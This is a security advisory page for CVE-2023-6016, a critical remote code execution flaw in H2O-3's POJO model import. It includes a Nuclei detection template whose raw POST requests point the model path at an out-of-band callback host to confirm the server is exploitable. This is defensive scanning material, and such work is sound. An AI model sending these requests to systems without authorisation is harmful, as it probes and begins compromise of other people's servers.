Critical

h2o-3

Remote Code Execution via Source POJO Model Import

A vulnerability in H2O-3 version 3.42.0.2 allows attackers to execute arbitrary code by uploading a malicious source POJO model. This issue, which leads to a full compromise of the system running H2O-3, was identified in the process of importing models through the web UI. The specific patch version addressing this vulnerability is not mentioned, indicating the need for users to consult the H2O-3 repository for updates.

Available publicly on Nov 16 2023

10

CVE:

CVE-2023-6016

CWE:

94:Improper Control of Generation of Code

CVSS:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit:

brycebearchell
AssessDetect

Available

Remediate
Nuclei Template
Nuclei Template
1id: h2o-pojo-import-rce
2
3info:
4  name: H2O RCE via POJO Model import
5  author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)
6  severity: critical
7  description: RCE in H2O dashboard by (ab)using it's POJO Model import feature
8  reference:
9    - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
10  classification:
11    cvss-score: 10
12    cve-id: CVE-2023-6016
13    cwe-id: CWE-78
14  tags: h2o-3,h2o,cve,ml,protectai,huntr
15
16http:
17  - raw:
18      - |
19        POST /3/ModelBuilders/generic/parameters HTTP/1.1
20        Host: {{Hostname}}
21        Content-Type: application/x-www-form-urlencoded
22
23        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51
24
25      - |
26        POST /3/ModelBuilders/generic/parameters HTTP/1.1
27        Host: {{Hostname}}
28        Content-Type: application/x-www-form-urlencoded
29
30        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
31
32      - |
33        POST /3/ModelBuilders/generic/parameters HTTP/1.1
34        Host: {{Hostname}}
35        Content-Type: application/x-www-form-urlencoded
36
37        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
38  
39      - |
40        POST /3/ModelBuilders/generic HTTP/1.1
41        Host: {{Hostname}}
42        Content-Type: application/x-www-form-urlencoded
43
44        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
45
46    matchers:
47      - type: word
48        part: interactsh_protocol # Confirms http Interaction
49        words:
50          - "http"
Resources

Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.

How to use Nuclei scanners

Learn more about scanners and how to use them

Want more out of Sightline?

Sightline offers even more for premium customers

Go Premium

We have - related security advisories that are available with Sightline Premium.